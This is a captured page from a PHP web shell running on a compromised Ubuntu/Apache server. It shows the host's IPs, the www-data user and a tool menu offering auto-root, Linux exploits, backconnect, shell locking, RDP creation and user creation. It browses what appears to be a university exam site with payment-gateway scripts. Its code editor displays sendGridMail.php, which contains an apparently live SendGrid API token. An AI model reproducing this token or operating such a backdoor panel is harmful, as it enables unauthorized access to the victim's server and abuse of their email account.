Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.188.190.212
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
bcu /
orms_stop /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxrwxr-x
admin
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxrwxr-x
default
[ DIR ]
drwxrwxr-x
docs
[ DIR ]
drwxrwxr-x
html_modules
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
tcpdf
[ DIR ]
drwxrwxr-x
uploads
[ DIR ]
drwxrwxrwx
16-01-2018_Guidelines_for_Scre...
2
MB
-rw-rw-r--
Subject and Post Details for A...
1.47
MB
-rw-rw-r--
app.php
416
B
-rw-rw-r--
cManualMailer.php
1.38
KB
-rw-rw-r--
cconfig.php
1.42
KB
-rw-rw-r--
cconfig2.php
741
B
-rw-rw-r--
extention.jpeg
84.66
KB
-rw-r--r--
home-copy.html
68.5
KB
-rw-rw-r--
home.html
10.25
KB
-rw-rw-r--
home.js
139.36
KB
-rw-rw-r--
home_21032018.html
7.17
KB
-rw-rw-r--
home_25102017.html
5.01
KB
-rw-rw-r--
home_30082017.html
61.38
KB
-rw-rw-r--
home__arun.html
63.56
KB
-rw-rw-r--
index.html
6.84
KB
-rw-rw-r--
index_16092017.html
5.55
KB
-rw-rw-r--
index_old.html
5.66
KB
-rw-rw-r--
main_page.html
5.38
KB
-rw-rw-r--
main_page_09092017_befirechang...
5.32
KB
-rw-rw-r--
payment_gate_way_responce.php
5.89
KB
-rw-rw-r--
payment_gateway.php
8.28
KB
-rw-rw-r--
payment_gateway_16022018.php
8.19
KB
-rw-rw-r--
pgResponse.php
5.3
KB
-rw-rw-r--
post.php
7.45
KB
-rw-rw-r--
registration.html
2.65
KB
-rw-rw-r--
script.js
1.02
KB
-rw-rw-r--
sendGridMail.php
1.29
KB
-rw-rw-r--
style.css
3.2
KB
-rw-rw-r--
upload_file.php
604
B
-rw-rw-r--
upload_file10.php
604
B
-rw-rw-r--
upload_file11.php
604
B
-rw-rw-r--
upload_file12.php
604
B
-rw-rw-r--
upload_file13.php
604
B
-rw-rw-r--
upload_file14.php
604
B
-rw-rw-r--
upload_file15.php
604
B
-rw-rw-r--
upload_file16.php
604
B
-rw-rw-r--
upload_file17.php
604
B
-rw-rw-r--
upload_file18.php
604
B
-rw-rw-r--
upload_file19.php
604
B
-rw-rw-r--
upload_file2.php
609
B
-rw-rw-r--
upload_file20.php
604
B
-rw-rw-r--
upload_file3.php
604
B
-rw-rw-r--
upload_file4.php
604
B
-rw-rw-r--
upload_file5.php
604
B
-rw-rw-r--
upload_file6.php
604
B
-rw-rw-r--
upload_file7.php
604
B
-rw-rw-r--
upload_file8.php
604
B
-rw-rw-r--
upload_file9.php
604
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sendGridMail.php
<?php error_reporting(E_ALL); /*$json_string = array( 'to' => array( 'example1@sendgrid.com', 'example2@sendgrid.com' ), 'category' => 'test_category' ); */ function sendGridMail($to, $subject, $html) { $url = 'https://api.sendgrid.com/'; $token = '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'; $params = array( 'to' => $to, 'subject' => $subject, 'html' => $html, 'from' => 'support@uniclare.com', ); $request = $url . 'api/mail.send.json'; $headr = array(); $headr[] = 'Authorization: Bearer ' . $token; // Generate curl request $session = curl_init($request); // Tell curl to use HTTP POST curl_setopt($session, CURLOPT_POST, true); // Tell curl that this is the body of the POST curl_setopt($session, CURLOPT_POSTFIELDS, $params); // Tell curl not to return headers, but do return the response curl_setopt($session, CURLOPT_HEADER, false); // Tell PHP not to use SSLv3 (instead opting for TLS) //curl_setopt($session, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_2); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); curl_setopt($session, CURLOPT_HTTPHEADER, $headr); // obtain response $response = curl_exec($session); curl_close($session); // print everything out return $response; }
Close